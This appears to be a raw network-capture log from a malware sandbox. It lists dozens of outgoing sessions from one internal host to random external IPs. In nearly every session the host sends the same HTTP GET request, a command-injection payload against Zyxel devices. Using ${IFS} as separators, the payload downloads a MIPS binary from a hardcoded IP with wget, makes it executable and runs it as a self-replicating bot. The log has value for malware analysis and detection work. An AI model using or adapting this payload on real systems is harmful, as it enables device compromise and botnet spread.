                                                        Jan 28, 2024 10:13:11.768065929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9227192.168.2.145185452.158.87.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768095970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9228192.168.2.1460796102.231.242.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768119097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9229192.168.2.1441062202.199.86.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768157959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9230192.168.2.1433092175.64.39.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768209934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9231192.168.2.1436864106.103.216.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768260956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9232192.168.2.1432942111.182.230.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768290997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9233192.168.2.1457862175.79.25.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768337965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9234192.168.2.1456430131.112.103.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768373966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9235192.168.2.1436412142.134.66.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768420935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9236192.168.2.1454850156.136.36.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768459082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9237192.168.2.145894219.211.213.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768512011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9238192.168.2.1454166130.185.212.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768548012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9239192.168.2.144266295.145.192.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768573999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9240192.168.2.1438108109.149.4.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768611908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9241192.168.2.144451254.224.164.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768649101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9242192.168.2.1443622171.124.220.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768690109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9243192.168.2.144708235.190.20.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768721104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9244192.168.2.1436306197.4.89.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768753052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9245192.168.2.1456890174.150.244.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768811941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9246192.168.2.145784877.36.7.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768834114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9247192.168.2.14542289.206.129.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768882036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9248192.168.2.143420492.133.21.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768929958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9249192.168.2.144599053.100.120.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.768985987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9250192.168.2.1453076179.171.130.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769018888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9251192.168.2.1446730135.157.90.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769076109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9252192.168.2.145921258.16.231.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769104004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9253192.168.2.1447008184.93.89.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769166946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9254192.168.2.1438938132.114.255.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769201994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9255192.168.2.1452210143.83.142.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769233942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9256192.168.2.144490652.230.26.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769263029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9257192.168.2.143334291.143.2.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769296885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9258192.168.2.145319020.244.75.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769341946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9259192.168.2.144642692.23.163.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769376993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9260192.168.2.1455176216.230.153.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769438982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9261192.168.2.1446914114.121.255.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769464016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9262192.168.2.145914882.163.169.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769503117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9263192.168.2.144138481.227.190.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769532919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9264192.168.2.1451542157.32.27.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769598961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9265192.168.2.1456900208.144.99.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769638062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9266192.168.2.146010049.76.250.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769665003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9267192.168.2.1447142160.229.132.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769716978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9268192.168.2.1446432163.187.57.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769752026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9269192.168.2.143446857.167.110.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769783974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9270192.168.2.143286836.151.32.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769812107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9271192.168.2.144595450.253.137.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769881010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9272192.168.2.1453234103.196.215.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769932032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9273192.168.2.1451054157.12.96.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769937038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9274192.168.2.145390496.184.39.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.769993067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9275192.168.2.1447606204.203.148.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770026922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9276192.168.2.146030231.183.109.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770070076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9277192.168.2.1435720129.31.205.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770124912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9278192.168.2.143591871.244.137.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770165920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9279192.168.2.1454064211.232.158.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770201921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9280192.168.2.144314485.143.63.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770220995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9281192.168.2.145858081.223.16.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770273924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9282192.168.2.1460756172.12.86.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770298958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9283192.168.2.144784291.35.234.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770358086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9284192.168.2.1435104114.1.90.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770394087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9285192.168.2.1457794208.96.71.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770423889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9286192.168.2.145943885.25.4.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.770462036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9287192.168.2.144758284.31.233.222443
                                                        TimestampBytes transferredDirectionData
